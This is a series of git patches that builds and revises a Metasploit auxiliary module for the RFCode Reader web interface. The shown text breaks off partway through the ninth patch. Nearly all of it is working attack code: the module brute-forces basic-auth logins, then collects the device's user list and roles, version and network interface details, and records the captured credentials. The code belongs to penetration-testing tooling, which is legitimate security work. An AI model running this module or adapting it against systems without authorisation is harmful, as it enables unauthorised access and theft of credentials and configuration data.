From 6b8e6b3f0c0a09b5f598a632d32cff2e8a053f28 Mon Sep 17 00:00:00 2001 From: Karn Ganeshen Date: Fri, 7 Jun 2013 23:53:09 +0530 Subject: [PATCH 1/9] Create rfcode_reader_enum.rb Adding new aux - RFCode Reader Web interface Login Brute Force & Config Capture Utility --- .../scanner/http/rfcode_reader_enum.rb | 193 ++++++++++++++++++ 1 file changed, 193 insertions(+) create mode 100644 modules/auxiliary/scanner/http/rfcode_reader_enum.rb diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb new file mode 100644 index 0000000000..dfff2c9621 --- /dev/null +++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb @@ -0,0 +1,193 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Scanner + + def initialize(info={}) + super(update_info(info, + 'Name' => 'RFCode Reader Web interface Login Utility', + 'Description' => %{ + This module simply attempts to login to a RFCode Reader web interface. Please note that + by default there is no authentication. In such a case, password brute force will not be performed. + If there is authentication configured, the module will attempt to find valid login credentials and + capture device information. + }, + 'Author' => + [ + 'Karn Ganeshen ' + ], + 'Version' => '1.0', + 'License' => MSF_LICENSE + + )) + + register_options( + [ + Opt::RPORT(80), + OptString.new('STOP_ON_SUCCESS', [true, 'Stop guessing when a credential works for a host', true]) + ], self.class) + + end + + # + # Info-Only + # Identify logged in user: /rfcode_reader/api/whoami.json?_dc=1369680704481 + # Capture list of users: /rfcode_reader/api/userlist.json?_dc=1370353972710 + # Interface configuration: /rfcode_reader/api/interfacestatus.json?_dc=1369678668067 + # Network configuration: /rfcode_reader/api/netconfigstatus.json?_dc=1369678669208 + # + + def run_host(ip) + if not is_app_rfreader? + print_error("Application does not appear to be RFCode Reader. Module will not continue.") + return + end + + print_status("Checking if authentication is required...") + if not is_auth_required? + print_warning("Application does not require authentication.") + user = '' + pass = '' + + # Collect device platform & configuration info + collect_info(user, pass) + return + end + + print_status("Brute-forcing...") + each_user_pass do |user, pass| + do_login(user, pass) + end + end + + # + # What's the point of running this module if the app actually isn't RFCode Reader? + # + def is_app_rfreader? + res = send_request_raw({'uri' => '/rfcode_reader/api/whoami.json?_dc=1369680704481'}) + return (res and res.code != 404) + end + + # + # The default install of RFCode Reader app does not require authentication. Instead, it'll log the + # user right in. If that's the case, no point to brute-force, either. + # + def is_auth_required? + user = '' + pass = '' + + res = send_request_cgi( + { + 'uri' => '/rfcode_reader/api/whoami.json?_dc=1369680704481', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + + return (res and res.body =~ /{ }/) ? false : true + end + + # + # Brute-force the login page + # + def do_login(user, pass) + + vprint_status("Trying username:'#{user}' with password:'#{pass}'") + begin + res = send_request_cgi( + { + 'uri' => '/rfcode_reader/api/whoami.json?_dc=1369680704481', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + + if not res or res.code == 401 + vprint_error("FAILED LOGIN. '#{user}' : '#{pass}' with code #{res.code}") + return :skip_pass + else + print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'") + + collect_info(user, pass) + + report_hash = { + :host => datastore['RHOST'], + :port => datastore['RPORT'], + :sname => 'RFCode Reader', + :user => user, + :pass => pass, + :active => true, + :type => 'password'} + + report_auth_info(report_hash) + return :next_user + end + rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT + print_error("HTTP Connection Failed, Aborting") + return :abort + end + end + + # + # Collect target info + # + def collect_info(user, pass) + + vprint_status("Collecting information from app as '#{user}':'#{pass}'...") + begin + + res = send_request_cgi( + { + 'uri' => '/rfcode_reader/api/version.json?_dc=1370460180056', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + + print_good("Collecting device platform info...") + print_good(res.body) + + res = send_request_cgi( + { + 'uri' => '/rfcode_reader/api/userlist.json?_dc=1370353972710', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + + print_good("Collecting user list...") + print_good(res.body) + + + res = send_request_cgi( + { + 'uri' => '/rfcode_reader/api/interfacestatus.json?_dc=1369678668067', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + + print_good("Collecting interface info…") + print_good(res.body) + + res = send_request_cgi( + { + 'uri' => '/rfcode_reader/api/netconfigstatus.json?_dc=1369678669208', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + + print_good("Collecting network configuration…") + print_good(res.body) + + + return + end + end +end From eb0ae6ed2759b7c452e516509bc8b29646f22ad2 Mon Sep 17 00:00:00 2001 From: Karn Ganeshen Date: Sat, 8 Jun 2013 01:00:18 +0530 Subject: [PATCH 2/9] Update rfcode_reader_enum.rb Updated as per review comments --- .../scanner/http/rfcode_reader_enum.rb | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb index dfff2c9621..a238834d22 100644 --- a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb +++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb @@ -21,14 +21,14 @@ class Metasploit3 < Msf::Auxiliary This module simply attempts to login to a RFCode Reader web interface. Please note that by default there is no authentication. In such a case, password brute force will not be performed. If there is authentication configured, the module will attempt to find valid login credentials and - capture device information. + capture device information. }, 'Author' => [ 'Karn Ganeshen ' ], 'Version' => '1.0', - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE )) @@ -49,13 +49,13 @@ class Metasploit3 < Msf::Auxiliary # def run_host(ip) - if not is_app_rfreader? + unless is_app_rfreader? print_error("Application does not appear to be RFCode Reader. Module will not continue.") return end print_status("Checking if authentication is required...") - if not is_auth_required? + unless is_auth_required? print_warning("Application does not require authentication.") user = '' pass = '' @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("Trying username:'#{user}' with password:'#{pass}'") + vprint_status("Trying username:'#{user.inspect}' with password:'#{pass.inspect}'") begin res = send_request_cgi( { @@ -112,10 +112,10 @@ class Metasploit3 < Msf::Auxiliary }) if not res or res.code == 401 - vprint_error("FAILED LOGIN. '#{user}' : '#{pass}' with code #{res.code}") + vprint_error("FAILED LOGIN. '#{user.inspect}' : '#{pass.inspect}' with code #{res.code}") return :skip_pass else - print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'") + print_good("SUCCESSFUL LOGIN. '#{user.inspect}' : '#{pass.inspect}'") collect_info(user, pass) @@ -131,7 +131,7 @@ class Metasploit3 < Msf::Auxiliary report_auth_info(report_hash) return :next_user end - rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE print_error("HTTP Connection Failed, Aborting") return :abort end @@ -142,7 +142,7 @@ class Metasploit3 < Msf::Auxiliary # def collect_info(user, pass) - vprint_status("Collecting information from app as '#{user}':'#{pass}'...") + vprint_status("Collecting information from app as '#{user.inspect}':'#{pass.inspect}'...") begin res = send_request_cgi( From ffa18d413f339ec738f040d80e1e554076742f1d Mon Sep 17 00:00:00 2001 From: Karn Ganeshen Date: Sat, 8 Jun 2013 03:21:43 +0530 Subject: [PATCH 3/9] Updated rfcode_reader_enum.rb ... Updated as per review comments. Removed loot of network configuration. Used JSON.parse to bring cleaner loot output Changed some print_goods to vprint_status Changed if not to unless --- .../scanner/http/rfcode_reader_enum.rb | 63 ++++++++----------- 1 file changed, 27 insertions(+), 36 deletions(-) diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb index a238834d22..17ee980d24 100644 --- a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb +++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb @@ -9,25 +9,24 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::Report + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Scanner def initialize(info={}) super(update_info(info, - 'Name' => 'RFCode Reader Web interface Login Utility', + 'Name' => 'RFCode Reader Web Interface Login Utility', 'Description' => %{ This module simply attempts to login to a RFCode Reader web interface. Please note that - by default there is no authentication. In such a case, password brute force will not be performed. - If there is authentication configured, the module will attempt to find valid login credentials and - capture device information. + by default there is no authentication. In such a case, password brute force will not be performed. + If there is authentication configured, the module will attempt to find valid login credentials and + capture device information. }, 'Author' => [ 'Karn Ganeshen ' ], - 'Version' => '1.0', 'License' => MSF_LICENSE )) @@ -45,7 +44,6 @@ class Metasploit3 < Msf::Auxiliary # Identify logged in user: /rfcode_reader/api/whoami.json?_dc=1369680704481 # Capture list of users: /rfcode_reader/api/userlist.json?_dc=1370353972710 # Interface configuration: /rfcode_reader/api/interfacestatus.json?_dc=1369678668067 - # Network configuration: /rfcode_reader/api/netconfigstatus.json?_dc=1369678669208 # def run_host(ip) @@ -146,25 +144,28 @@ class Metasploit3 < Msf::Auxiliary begin res = send_request_cgi( - { - 'uri' => '/rfcode_reader/api/version.json?_dc=1370460180056', - 'method' => 'GET', - 'authorization' => basic_auth(user,pass) - }) + { + 'uri' => '/rfcode_reader/api/version.json?_dc=1370460180056', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) - print_good("Collecting device platform info...") - print_good(res.body) + release_ver = JSON.parse(res.body)["release"] + product_name = JSON.parse(res.body)["product"] + + vprint_status("Collecting device platform info...") + print_good("Release version: '#{release_ver}', Product Name: '#{product_name}'") res = send_request_cgi( - { - 'uri' => '/rfcode_reader/api/userlist.json?_dc=1370353972710', - 'method' => 'GET', - 'authorization' => basic_auth(user,pass) - }) - - print_good("Collecting user list...") - print_good(res.body) + { + 'uri' => '/rfcode_reader/api/userlist.json?_dc=1370353972710', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + userlist = JSON.parse(res.body) + vprint_status("Collecting user list...") + print_good("User list & role: #{userlist}") res = send_request_cgi( { @@ -173,19 +174,9 @@ class Metasploit3 < Msf::Auxiliary 'authorization' => basic_auth(user,pass) }) - print_good("Collecting interface info…") - print_good(res.body) - - res = send_request_cgi( - { - 'uri' => '/rfcode_reader/api/netconfigstatus.json?_dc=1369678669208', - 'method' => 'GET', - 'authorization' => basic_auth(user,pass) - }) - - print_good("Collecting network configuration…") - print_good(res.body) - + eth0_info = JSON.parse(res.body)["eth0"] + vprint_status("Collecting interface info...") + print_good("Interface eth0 info: #{eth0_info}") return end From 72a9c8612bdf6d9f5fddd23b69d8d8fdf58b6c36 Mon Sep 17 00:00:00 2001 From: KarnGaneshen Date: Mon, 10 Jun 2013 22:57:00 +0530 Subject: [PATCH 4/9] setting rfcode_reader_enum straight. more updates. --- .../scanner/http/rfcode_reader_enum.rb | 56 ++++++++++++++----- 1 file changed, 42 insertions(+), 14 deletions(-) diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb index 17ee980d24..628ee76012 100644 --- a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb +++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb @@ -41,9 +41,10 @@ class Metasploit3 < Msf::Auxiliary # # Info-Only - # Identify logged in user: /rfcode_reader/api/whoami.json?_dc=1369680704481 - # Capture list of users: /rfcode_reader/api/userlist.json?_dc=1370353972710 - # Interface configuration: /rfcode_reader/api/interfacestatus.json?_dc=1369678668067 + # Identify logged in user: /rfcode_reader/api/whoami.json + # Capture list of users: /rfcode_reader/api/userlist.json + # Interface configuration: /rfcode_reader/api/interfacestatus.json + # Device platform details: /rfcode_reader/api/version.json # def run_host(ip) @@ -73,7 +74,14 @@ class Metasploit3 < Msf::Auxiliary # What's the point of running this module if the app actually isn't RFCode Reader? # def is_app_rfreader? - res = send_request_raw({'uri' => '/rfcode_reader/api/whoami.json?_dc=1369680704481'}) + res = send_request_cgi( + { + 'uri' => '/rfcode_reader/api/whoami.json', + 'vars_get' => + { + '_dc' => '1369680704481' + } + }) return (res and res.code != 404) end @@ -87,9 +95,13 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi( { - 'uri' => '/rfcode_reader/api/whoami.json?_dc=1369680704481', + 'uri' => '/rfcode_reader/api/whoami.json', 'method' => 'GET', - 'authorization' => basic_auth(user,pass) + 'authorization' => basic_auth(user,pass), + 'vars_get' => + { + '_dc' => '1369680704481' + } }) return (res and res.body =~ /{ }/) ? false : true @@ -104,9 +116,13 @@ class Metasploit3 < Msf::Auxiliary begin res = send_request_cgi( { - 'uri' => '/rfcode_reader/api/whoami.json?_dc=1369680704481', + 'uri' => '/rfcode_reader/api/whoami.json', 'method' => 'GET', - 'authorization' => basic_auth(user,pass) + 'authorization' => basic_auth(user,pass), + 'vars_get' => + { + '_dc' => '1369680704481' + } }) if not res or res.code == 401 @@ -145,9 +161,13 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi( { - 'uri' => '/rfcode_reader/api/version.json?_dc=1370460180056', + 'uri' => '/rfcode_reader/api/version.json', 'method' => 'GET', - 'authorization' => basic_auth(user,pass) + 'authorization' => basic_auth(user,pass), + 'vars_get' => + { + '_dc' => '1370460180056' + } }) release_ver = JSON.parse(res.body)["release"] @@ -158,9 +178,13 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi( { - 'uri' => '/rfcode_reader/api/userlist.json?_dc=1370353972710', + 'uri' => '/rfcode_reader/api/userlist.json', 'method' => 'GET', - 'authorization' => basic_auth(user,pass) + 'authorization' => basic_auth(user,pass), + 'vars_get' => + { + '_dc' => '1370353972710' + } }) userlist = JSON.parse(res.body) @@ -169,9 +193,13 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi( { - 'uri' => '/rfcode_reader/api/interfacestatus.json?_dc=1369678668067', + 'uri' => '/rfcode_reader/api/interfacestatus.json', 'method' => 'GET', - 'authorization' => basic_auth(user,pass) + 'authorization' => basic_auth(user,pass), + 'vars_get' => + { + '_dc' => '1369678668067' + } }) eth0_info = JSON.parse(res.body)["eth0"] From 5c078f5139f7c8d271e3b0cb0833ff3946365ce4 Mon Sep 17 00:00:00 2001 From: KarnGaneshen Date: Tue, 11 Jun 2013 12:57:26 +0530 Subject: [PATCH 5/9] added report_note to store collected info. removed register rport for 80t. msftidy & module load checked. pushing it up. --- .../scanner/http/rfcode_reader_enum.rb | 30 +++++++++++++++---- 1 file changed, 25 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb index 628ee76012..dd6ca1abc8 100644 --- a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb +++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb @@ -18,10 +18,9 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'RFCode Reader Web Interface Login Utility', 'Description' => %{ - This module simply attempts to login to a RFCode Reader web interface. Please note that - by default there is no authentication. In such a case, password brute force will not be performed. - If there is authentication configured, the module will attempt to find valid login credentials and - capture device information. + This module simply attempts to login to a RFCode Reader web interface. + Please note that by default there is no authentication. In such a case, password brute force will not be performed. + If there is authentication configured, the module will attempt to find valid login credentials and capture device information. }, 'Author' => [ @@ -33,7 +32,6 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - Opt::RPORT(80), OptString.new('STOP_ON_SUCCESS', [true, 'Stop guessing when a credential works for a host', true]) ], self.class) @@ -176,6 +174,13 @@ class Metasploit3 < Msf::Auxiliary vprint_status("Collecting device platform info...") print_good("Release version: '#{release_ver}', Product Name: '#{product_name}'") + report_note( + :host => datastore['RHOST'], + :proto => 'tcp', + :port => datastore['RPORT'], + :data => 'Release Version: #{release_ver}, Product: #{product_name}' + ) + res = send_request_cgi( { 'uri' => '/rfcode_reader/api/userlist.json', @@ -191,6 +196,14 @@ class Metasploit3 < Msf::Auxiliary vprint_status("Collecting user list...") print_good("User list & role: #{userlist}") + report_note( + :host => datastore['RHOST'], + :proto => 'tcp', + :port => datastore['RPORT'], + :data => 'User List & Roles: #{userlist}' + ) + + res = send_request_cgi( { 'uri' => '/rfcode_reader/api/interfacestatus.json', @@ -206,6 +219,13 @@ class Metasploit3 < Msf::Auxiliary vprint_status("Collecting interface info...") print_good("Interface eth0 info: #{eth0_info}") + report_note( + :host => datastore['RHOST'], + :proto => 'tcp', + :port => datastore['RPORT'], + :data => 'Interface eth0: #{eth0_info}' + ) + return end end From 736bf120d93931042c61dac2bdf2499f06201ed3 Mon Sep 17 00:00:00 2001 From: KarnGaneshen Date: Wed, 12 Jun 2013 00:25:50 +0530 Subject: [PATCH 6/9] added sname in report data, corrected :host to rhost, :port to rport. msftidy check. module load check. upping it. --- .../scanner/http/rfcode_reader_enum.rb | 25 +++++++++++-------- 1 file changed, 14 insertions(+), 11 deletions(-) diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb index dd6ca1abc8..34fbb06845 100644 --- a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb +++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb @@ -132,8 +132,8 @@ class Metasploit3 < Msf::Auxiliary collect_info(user, pass) report_hash = { - :host => datastore['RHOST'], - :port => datastore['RPORT'], + :host => rhost, + :port => rport, :sname => 'RFCode Reader', :user => user, :pass => pass, @@ -172,12 +172,13 @@ class Metasploit3 < Msf::Auxiliary product_name = JSON.parse(res.body)["product"] vprint_status("Collecting device platform info...") - print_good("Release version: '#{release_ver}', Product Name: '#{product_name}'") + print_good("#{rhost}:#{rport} -> Release version: '#{release_ver}', Product Name: '#{product_name}'") report_note( - :host => datastore['RHOST'], + :host => rhost, :proto => 'tcp', - :port => datastore['RPORT'], + :port => rport, + :sname => "RFCode Reader", :data => 'Release Version: #{release_ver}, Product: #{product_name}' ) @@ -194,12 +195,13 @@ class Metasploit3 < Msf::Auxiliary userlist = JSON.parse(res.body) vprint_status("Collecting user list...") - print_good("User list & role: #{userlist}") + print_good("#{rhost}:#{rport} -> User list & role: #{userlist}") report_note( - :host => datastore['RHOST'], + :host => rhost, :proto => 'tcp', - :port => datastore['RPORT'], + :port => rport, + :sname => "RFCode Reader", :data => 'User List & Roles: #{userlist}' ) @@ -220,10 +222,11 @@ class Metasploit3 < Msf::Auxiliary print_good("Interface eth0 info: #{eth0_info}") report_note( - :host => datastore['RHOST'], + :host => rhost, :proto => 'tcp', - :port => datastore['RPORT'], - :data => 'Interface eth0: #{eth0_info}' + :port => rport, + :sname => "RFCode Reader", + :data => '#{rhost}:#{rport} -> Interface eth0: #{eth0_info}' ) return From 871f1b7c1f836184e096e9106dc4b28b535c3d02 Mon Sep 17 00:00:00 2001 From: KarnGaneshen Date: Wed, 12 Jun 2013 00:53:58 +0530 Subject: [PATCH 7/9] updated prints with ip-port reference. msftidy check. module load check. go rf reader.. --- .../scanner/http/rfcode_reader_enum.rb | 28 +++++++++---------- 1 file changed, 14 insertions(+), 14 deletions(-) diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb index 34fbb06845..d4c4b5f498 100644 --- a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb +++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb @@ -47,13 +47,13 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless is_app_rfreader? - print_error("Application does not appear to be RFCode Reader. Module will not continue.") + print_error("#{rhost}:#{rport} -> Application does not appear to be RFCode Reader. Module will not continue.") return end - print_status("Checking if authentication is required...") + print_status("#{rhost}:#{rport} -> Checking if authentication is required...") unless is_auth_required? - print_warning("Application does not require authentication.") + print_warning("#{rhost}:#{rport} -> Application does not require authentication.") user = '' pass = '' @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("Brute-forcing...") + print_status("#{rhost}:#{rport} -> Brute-forcing...") each_user_pass do |user, pass| do_login(user, pass) end @@ -110,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("Trying username:'#{user.inspect}' with password:'#{pass.inspect}'") + vprint_status("#{rhost}:#{rport} -> Trying username:'#{user.inspect}' with password:'#{pass.inspect}'") begin res = send_request_cgi( { @@ -124,10 +124,10 @@ class Metasploit3 < Msf::Auxiliary }) if not res or res.code == 401 - vprint_error("FAILED LOGIN. '#{user.inspect}' : '#{pass.inspect}' with code #{res.code}") + vprint_error("#{rhost}:#{rport} -> FAILED LOGIN - '#{user.inspect}' : '#{pass.inspect}' with code #{res.code}") return :skip_pass else - print_good("SUCCESSFUL LOGIN. '#{user.inspect}' : '#{pass.inspect}'") + print_good("#{rhost}:#{rport} -> SUCCESSFUL LOGIN - '#{user.inspect}' : '#{pass.inspect}'") collect_info(user, pass) @@ -144,7 +144,7 @@ class Metasploit3 < Msf::Auxiliary return :next_user end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - print_error("HTTP Connection Failed, Aborting") + print_error("#{rhost}:#{rport} -> HTTP Connection Failed, Aborting") return :abort end end @@ -154,7 +154,7 @@ class Metasploit3 < Msf::Auxiliary # def collect_info(user, pass) - vprint_status("Collecting information from app as '#{user.inspect}':'#{pass.inspect}'...") + vprint_status("#{rhost}:#{rport} -> Collecting information from app as '#{user.inspect}':'#{pass.inspect}'...") begin res = send_request_cgi( @@ -171,7 +171,7 @@ class Metasploit3 < Msf::Auxiliary release_ver = JSON.parse(res.body)["release"] product_name = JSON.parse(res.body)["product"] - vprint_status("Collecting device platform info...") + vprint_status("#{rhost}:#{rport} -> Collecting device platform info...") print_good("#{rhost}:#{rport} -> Release version: '#{release_ver}', Product Name: '#{product_name}'") report_note( @@ -194,7 +194,7 @@ class Metasploit3 < Msf::Auxiliary }) userlist = JSON.parse(res.body) - vprint_status("Collecting user list...") + vprint_status("#{rhost}:#{rport} -> Collecting user list...") print_good("#{rhost}:#{rport} -> User list & role: #{userlist}") report_note( @@ -218,15 +218,15 @@ class Metasploit3 < Msf::Auxiliary }) eth0_info = JSON.parse(res.body)["eth0"] - vprint_status("Collecting interface info...") - print_good("Interface eth0 info: #{eth0_info}") + vprint_status("#{rhost}:#{rport} -> Collecting interface info...") + print_good("#{rhost}:#{rport} -> Interface eth0 info: #{eth0_info}") report_note( :host => rhost, :proto => 'tcp', :port => rport, :sname => "RFCode Reader", - :data => '#{rhost}:#{rport} -> Interface eth0: #{eth0_info}' + :data => 'Interface eth0: #{eth0_info}' ) return From 6188df1b3aab2d06e5b803f25553409ab467cff3 Mon Sep 17 00:00:00 2001 From: KarnGaneshen Date: Thu, 13 Jun 2013 14:03:55 +0530 Subject: [PATCH 8/9] added note :type - Info. This is mandatory field for report_note. also, vprint statements seem to be adding an extra space with a hyphen. kinda make print dis-aligned than other regular print_* statements. changed -> to -, removed ' from '#{user/pass}'. works fine. msftidy check. module load check. pcap taken. --- .../scanner/http/rfcode_reader_enum.rb | 39 ++++++++++--------- 1 file changed, 21 insertions(+), 18 deletions(-) diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb index d4c4b5f498..953124b98e 100644 --- a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb +++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb @@ -47,13 +47,13 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless is_app_rfreader? - print_error("#{rhost}:#{rport} -> Application does not appear to be RFCode Reader. Module will not continue.") + print_error("#{rhost}:#{rport} - Application does not appear to be RFCode Reader. Module will not continue.") return end - print_status("#{rhost}:#{rport} -> Checking if authentication is required...") + print_status("#{rhost}:#{rport} - Checking if authentication is required...") unless is_auth_required? - print_warning("#{rhost}:#{rport} -> Application does not require authentication.") + print_warning("#{rhost}:#{rport} - Application does not require authentication.") user = '' pass = '' @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{rhost}:#{rport} -> Brute-forcing...") + print_status("#{rhost}:#{rport} - Brute-forcing...") each_user_pass do |user, pass| do_login(user, pass) end @@ -110,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{rhost}:#{rport} -> Trying username:'#{user.inspect}' with password:'#{pass.inspect}'") + vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { @@ -124,10 +124,10 @@ class Metasploit3 < Msf::Auxiliary }) if not res or res.code == 401 - vprint_error("#{rhost}:#{rport} -> FAILED LOGIN - '#{user.inspect}' : '#{pass.inspect}' with code #{res.code}") + vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect} with code #{res.code}") return :skip_pass else - print_good("#{rhost}:#{rport} -> SUCCESSFUL LOGIN - '#{user.inspect}' : '#{pass.inspect}'") + print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") collect_info(user, pass) @@ -144,7 +144,7 @@ class Metasploit3 < Msf::Auxiliary return :next_user end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - print_error("#{rhost}:#{rport} -> HTTP Connection Failed, Aborting") + print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting") return :abort end end @@ -154,7 +154,7 @@ class Metasploit3 < Msf::Auxiliary # def collect_info(user, pass) - vprint_status("#{rhost}:#{rport} -> Collecting information from app as '#{user.inspect}':'#{pass.inspect}'...") + vprint_status("#{rhost}:#{rport} - Collecting information from app as #{user.inspect}:#{pass.inspect}...") begin res = send_request_cgi( @@ -171,15 +171,16 @@ class Metasploit3 < Msf::Auxiliary release_ver = JSON.parse(res.body)["release"] product_name = JSON.parse(res.body)["product"] - vprint_status("#{rhost}:#{rport} -> Collecting device platform info...") - print_good("#{rhost}:#{rport} -> Release version: '#{release_ver}', Product Name: '#{product_name}'") + vprint_status("#{rhost}:#{rport} - Collecting device platform info...") + print_good("#{rhost}:#{rport} - Release version: '#{release_ver}', Product Name: '#{product_name}'") report_note( :host => rhost, :proto => 'tcp', :port => rport, :sname => "RFCode Reader", - :data => 'Release Version: #{release_ver}, Product: #{product_name}' + :data => 'Release Version: #{release_ver}, Product: #{product_name}', + :type => 'Info' ) res = send_request_cgi( @@ -194,15 +195,16 @@ class Metasploit3 < Msf::Auxiliary }) userlist = JSON.parse(res.body) - vprint_status("#{rhost}:#{rport} -> Collecting user list...") - print_good("#{rhost}:#{rport} -> User list & role: #{userlist}") + vprint_status("#{rhost}:#{rport} - Collecting user list...") + print_good("#{rhost}:#{rport} - User list & role: #{userlist}") report_note( :host => rhost, :proto => 'tcp', :port => rport, :sname => "RFCode Reader", - :data => 'User List & Roles: #{userlist}' + :data => 'User List & Roles: #{userlist}', + :type => 'Info' ) @@ -218,15 +220,16 @@ class Metasploit3 < Msf::Auxiliary }) eth0_info = JSON.parse(res.body)["eth0"] - vprint_status("#{rhost}:#{rport} -> Collecting interface info...") - print_good("#{rhost}:#{rport} -> Interface eth0 info: #{eth0_info}") + vprint_status("#{rhost}:#{rport} - Collecting interface info...") + print_good("#{rhost}:#{rport} - Interface eth0 info: #{eth0_info}") report_note( :host => rhost, :proto => 'tcp', :port => rport, :sname => "RFCode Reader", - :data => 'Interface eth0: #{eth0_info}' + :data => 'Interface eth0: #{eth0_info}', + :type => 'Info' ) return From ae027a9efba868826ad9884fb747552bc4bc29f6 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 14 Jun 2013 13:09:48 -0500 Subject: [PATCH 9/9] Final cleanup for rfcode_reader_enum --- .../scanner/http/rfcode_reader_enum.rb | 84 +++++++++++-------- 1 file changed, 47 insertions(+), 37 deletions(-) diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb index 953124b98e..d64cb4939a 100644 --- a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb +++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptString.new('STOP_ON_SUCCESS', [true, 'Stop guessing when a credential works for a host', true]) + OptBool.new('STOP_ON_SUCCESS', [ true, "Stop guessing when a credential works for a host", true]) ], self.class) end @@ -125,7 +125,6 @@ class Metasploit3 < Msf::Auxiliary if not res or res.code == 401 vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect} with code #{res.code}") - return :skip_pass else print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") @@ -168,20 +167,22 @@ class Metasploit3 < Msf::Auxiliary } }) - release_ver = JSON.parse(res.body)["release"] - product_name = JSON.parse(res.body)["product"] + if res and res.body + release_ver = JSON.parse(res.body)["release"] + product_name = JSON.parse(res.body)["product"] - vprint_status("#{rhost}:#{rport} - Collecting device platform info...") - print_good("#{rhost}:#{rport} - Release version: '#{release_ver}', Product Name: '#{product_name}'") + vprint_status("#{rhost}:#{rport} - Collecting device platform info...") + 